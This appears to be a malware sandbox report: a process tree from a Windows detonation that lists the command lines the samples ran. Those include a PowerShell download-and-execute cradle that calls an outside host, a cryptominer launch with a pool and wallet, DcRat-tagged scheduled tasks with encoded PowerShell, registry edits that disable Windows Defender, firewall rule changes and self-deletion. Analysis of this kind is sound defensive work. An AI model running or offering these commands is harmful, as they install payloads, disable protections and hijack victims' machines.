        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        9⤵
        DcRat
        Creates scheduled task(s)
        
        PID:5904
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        7⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:2188
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\pskill.exe"
    3⤵
    PID:5236
  - - C:\Users\Admin\AppData\Local\Temp\Files\pskill.exe
      C:\Users\Admin\AppData\Local\Temp\Files\pskill.exe
      4⤵
      PID:5096
    - - C:\Users\Admin\AppData\Local\Temp\Files\._cache_pskill.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\._cache_pskill.exe"
        5⤵
        
        PID:2500
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 808
        6⤵
        Program crash
        
        PID:5412
    - - C:\ProgramData\Synaptics\Synaptics.exe
        
        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        5⤵
        
        PID:3336
      - C:\Users\Admin\AppData\Local\Temp\Files\._cache_Synaptics.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\._cache_Synaptics.exe" InjUpdate
        6⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 812
        7⤵
        Program crash
        
        PID:4532
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\data64_1.exe"
    3⤵
    PID:644
  - - C:\Users\Admin\AppData\Local\Temp\Files\data64_1.exe
      C:\Users\Admin\AppData\Local\Temp\Files\data64_1.exe
      4⤵
      PID:236
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 236 -s 1296
        5⤵
        Program crash
        
        PID:664
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"
    3⤵
    PID:540
  - - C:\Users\Admin\AppData\Local\Temp\Files\v2.exe
      C:\Users\Admin\AppData\Local\Temp\Files\v2.exe
      4⤵
      PID:1516
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        5⤵
        
        PID:3224
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\PCCLEA~1.EXE"
    3⤵
    PID:6076
  - - C:\Users\Admin\AppData\Local\Temp\Files\PCCLEA~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\PCCLEA~1.EXE
      4⤵
      PID:2264
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\Files\file.exe
      C:\Users\Admin\AppData\Local\Temp\Files\file.exe
      4⤵
      PID:2076
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')"
        5⤵
        
        PID:4044
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\sysnative\cmd.exe /c powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')
        6⤵
        
        PID:2988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')
        7⤵
        
        PID:3728
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\file.exe" >> NUL
        5⤵
        
        PID:4800
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE"
    3⤵
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE
      4⤵
      PID:3440
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\INSTAL~2.EXE" -Force
        5⤵
        
        PID:3252
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        5⤵
        
        PID:4936
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\OKZZM7~1.EXE"
        6⤵
        
        PID:4156
        
        C:\Users\Admin\Pictures\OKZZM7~1.EXE
        
        C:\Users\Admin\Pictures\OKZZM7~1.EXE
        7⤵
        
        PID:2200
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\Y8ETEU~1.EXE"
        6⤵
        Modifies registry class
        
        PID:5128
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\XBGC8W~1.EXE"
        6⤵
        
        PID:6076
        
        C:\Users\Admin\Pictures\XBGC8W~1.EXE
        
        C:\Users\Admin\Pictures\XBGC8W~1.EXE
        7⤵
        
        PID:4684
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\I80HUL~1.EXE"
        6⤵
        
        PID:2292
        
        C:\Users\Admin\Pictures\I80HUL~1.EXE
        
        C:\Users\Admin\Pictures\I80HUL~1.EXE
        7⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:5544
        
        C:\Users\Admin\Pictures\I80HUL~1.EXE
        
        "C:\Users\Admin\Pictures\I80HUL~1.EXE"
        8⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:6668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:5204
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:1532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:4328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 988
        9⤵
        Program crash
        
        PID:4264
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 660
        8⤵
        Program crash
        
        PID:6228
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\G5VUMN~1.EXE"
        6⤵
        
        PID:4796
        
        C:\Users\Admin\Pictures\G5VUMN~1.EXE
        
        C:\Users\Admin\Pictures\G5VUMN~1.EXE
        7⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:1188
        
        C:\Users\Admin\Pictures\G5VUMN~1.EXE
        
        "C:\Users\Admin\Pictures\G5VUMN~1.EXE"
        8⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:3932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:6336
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:2488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:7080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 924
        9⤵
        Program crash
        
        PID:1596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 860
        8⤵
        Program crash
        
        PID:3996
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\HZDB6G~1.EXE"
        6⤵
        
        PID:3048
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\CPAQFP~1.EXE"
        6⤵
        
        PID:3496
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\NDCNZR~1.EXE"
        6⤵
        
        PID:2528
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ROME2C~1.EXE" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
        6⤵
        
        PID:1428
        
        C:\Users\Admin\Pictures\ROME2C~1.EXE
        
        C:\Users\Admin\Pictures\ROME2C~1.EXE PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
        7⤵
        
        PID:5468
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\II6QXX~1.EXE"
        6⤵
        
        PID:3612
        
        C:\Users\Admin\Pictures\II6QXX~1.EXE
        
        C:\Users\Admin\Pictures\II6QXX~1.EXE
        7⤵
        
        PID:5216
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\QZUCJI~1.EXE"
        6⤵
        
        PID:1060
        
        C:\Users\Admin\Pictures\QZUCJI~1.EXE
        
        C:\Users\Admin\Pictures\QZUCJI~1.EXE
        7⤵
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\7zS3561.tmp\Install.exe
        
        .\Install.exe
        8⤵
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\7zS5608.tmp\Install.exe
        
        .\Install.exe /klhTMdidYdHl "385118" /S
        9⤵
        
        PID:2052
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        10⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        11⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        12⤵
        
        PID:6400
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        13⤵
        
        PID:6688
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        13⤵
        
        PID:6824
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        10⤵
        
        PID:1512
        
        C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        11⤵
        
        PID:6164
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        12⤵
        
        PID:6668
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        13⤵
        
        PID:6860
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        13⤵
        Drops file in Windows directory
        Modifies registry class
        
        PID:4076
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gBhUqdGhM" /SC once /ST 14:27:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        10⤵
        DcRat
        Creates scheduled task(s)
        
        PID:6528
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gBhUqdGhM"
        10⤵
        
        PID:7136
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gBhUqdGhM"
        10⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bgKZxxDIOpRGITjYTe" /SC once /ST 15:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\JUGvIKEgUujoQLJ\PqkpRPi.exe\" Ik /Kosite_idXNO 385118 /S" /V1 /F
        10⤵
        DcRat
        Creates scheduled task(s)
        
        PID:6856
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bgKZxxDIOpRGITjYTe"
        10⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "OvvioKEypuBLsTFYZ" /SC once /ST 13:33:29 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\tKpADNrKyKjYycp\oilfdto.exe\" dM /Jpsite_idlYS 385118 /S" /V1 /F
        10⤵
        DcRat
        Creates scheduled task(s)
        
        PID:5924
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "OvvioKEypuBLsTFYZ"
        10⤵
        
        PID:6964
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\E3DHQK~1.EXE" --silent --allusers=0
        6⤵
        
        PID:468
        
        C:\Users\Admin\Pictures\E3DHQK~1.EXE
        
        C:\Users\Admin\Pictures\E3DHQK~1.EXE --silent --allusers=0
        7⤵
        
        PID:2736
        
        C:\Users\Admin\Pictures\E3DHQK~1.EXE
        
        C:\Users\Admin\Pictures\E3DHQK~1.EXE --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x300,0x304,0x308,0x2dc,0x30c,0x69f49530,0x69f4953c,0x69f49548
        8⤵
        
        PID:3320
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\E3DHQK~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\E3DHQK~1.EXE" --version
        8⤵
        
        PID:1620
        
        C:\Users\Admin\Pictures\E3DHQK~1.EXE
        
        "C:\Users\Admin\Pictures\E3DHQK~1.EXE" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2736 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240116154918" --session-guid=4aa427cd-3eb2-489c-813f-c1bd85df29b5 --server-tracking-blob=OTBlYTU3YzE2YmNiOTBkMTU3YjVkYjc3ODAxMDM3MzExNGNlNzNhNTdiODQ4NTU4MDY0ZGVjZDYwYmJmODNiZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNTQyMDEzNi40OTQ5IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIzYWFhZGVhYS1jMDJjLTQyNDItOGNjYy0yYjYyODg2YTg0MTIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5005000000000000
        8⤵
        
        PID:3972
        
        C:\Users\Admin\Pictures\E3DHQK~1.EXE
        
        C:\Users\Admin\Pictures\E3DHQK~1.EXE --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x30c,0x310,0x314,0x264,0x318,0x69669530,0x6966953c,0x69669548
        9⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549181\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549181\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
        8⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549181\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401161549181\assistant\assistant_installer.exe" --version
        8⤵
        
        PID:5748
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\FR5UMX~1.EXE"
        6⤵
        
        PID:6184
        
        C:\Users\Admin\Pictures\FR5UMX~1.EXE
        
        C:\Users\Admin\Pictures\FR5UMX~1.EXE
        7⤵
        
        PID:7100
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\2UXNFJ~1.EXE"
        6⤵
        
        PID:6932
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\JCA0W3~1.EXE"
        6⤵
        
        PID:4876
        
        C:\Users\Admin\Pictures\JCA0W3~1.EXE
        
        C:\Users\Admin\Pictures\JCA0W3~1.EXE
        7⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:7924
        
        C:\Users\Admin\Pictures\JCA0W3~1.EXE
        
        "C:\Users\Admin\Pictures\JCA0W3~1.EXE"
        8⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:4612
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6096 -s 644
        8⤵
        Program crash
        
        PID:3096
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\7IYLF6~1.EXE"
        6⤵
        
        PID:5500
        
        C:\Users\Admin\Pictures\7IYLF6~1.EXE
        
        C:\Users\Admin\Pictures\7IYLF6~1.EXE
        7⤵
        
        PID:5700
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ICEAM2~1.EXE"
        6⤵
        
        PID:2780
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\WGVJTL~1.EXE"
        6⤵
        
        PID:6428
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\NGAWQP~1.EXE"
        6⤵
        
        PID:6952
        
        C:\Users\Admin\Pictures\NGAWQP~1.EXE
        
        C:\Users\Admin\Pictures\NGAWQP~1.EXE
        7⤵
        
        PID:888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:8032
        
        C:\Users\Admin\Pictures\NGAWQP~1.EXE
        
        "C:\Users\Admin\Pictures\NGAWQP~1.EXE"
        8⤵
        
        PID:6456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        
        PID:3928
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\JIGZK0~1.EXE"
        6⤵
        
        PID:4540
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\2RFBEC~1.EXE" --silent --allusers=0
        6⤵
        
        PID:7152
        
        C:\Users\Admin\Pictures\2RFBEC~1.EXE
        
        C:\Users\Admin\Pictures\2RFBEC~1.EXE --silent --allusers=0
        7⤵
        
        PID:3248
        
        C:\Users\Admin\Pictures\2RFBEC~1.EXE
        
        C:\Users\Admin\Pictures\2RFBEC~1.EXE --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.41 --initial-client-data=0x348,0x34c,0x350,0x324,0x354,0x64849530,0x6484953c,0x64849548
        8⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2RFBEC~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2RFBEC~1.EXE" --version
        8⤵
        
        PID:7224
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\JUE7OD~1.EXE" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
        6⤵
        
        PID:2308
        
        C:\Users\Admin\Pictures\JUE7OD~1.EXE
        
        C:\Users\Admin\Pictures\JUE7OD~1.EXE PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
        7⤵
        
        PID:7112
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\UGHW1L~1.EXE"
        6⤵
        
        PID:2640
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\KMXW28~1.EXE"
        6⤵
        
        PID:7628
        
        C:\Users\Admin\Pictures\KMXW28~1.EXE
        
        C:\Users\Admin\Pictures\KMXW28~1.EXE
        7⤵
        
        PID:8096
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ALJNA6~1.EXE"
        6⤵
        
        PID:388
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\A9MBEF~1.EXE"
        6⤵
        
        PID:7944
        
        C:\Users\Admin\Pictures\A9MBEF~1.EXE
        
        C:\Users\Admin\Pictures\A9MBEF~1.EXE
        7⤵
        
        PID:7508
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\4JTKOS~1.EXE"
        6⤵
        
        PID:2104
        
        C:\Users\Admin\Pictures\4JTKOS~1.EXE
        
        C:\Users\Admin\Pictures\4JTKOS~1.EXE
        7⤵
        
        PID:1272
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\1OLRYR~1.EXE"
        6⤵
        
        PID:7024
        
        C:\Users\Admin\Pictures\1OLRYR~1.EXE
        
        C:\Users\Admin\Pictures\1OLRYR~1.EXE
        7⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:7580
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\TCY1RF~1.EXE"
        6⤵
        
        PID:3288
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\CREXCI~1.EXE" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
        6⤵
        
        PID:400
        
        C:\Users\Admin\Pictures\CREXCI~1.EXE
        
        C:\Users\Admin\Pictures\CREXCI~1.EXE PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==
        7⤵
        
        PID:6228
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\K1JFJQ~1.EXE"
        6⤵
        
        PID:4404
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\KWWULB~1.EXE"
        6⤵
        
        PID:4084
        
        C:\Users\Admin\Pictures\KWWULB~1.EXE
        
        C:\Users\Admin\Pictures\KWWULB~1.EXE
        7⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        
        PID:7572
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ODMFD6~1.EXE"
        6⤵
        
        PID:6192
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\GMJEJN~1.EXE" --silent --allusers=0
        6⤵
        
        PID:6332
        
        C:\Users\Admin\Pictures\GMJEJN~1.EXE
        
        C:\Users\Admin\Pictures\GMJEJN~1.EXE --silent --allusers=0
        7⤵
        
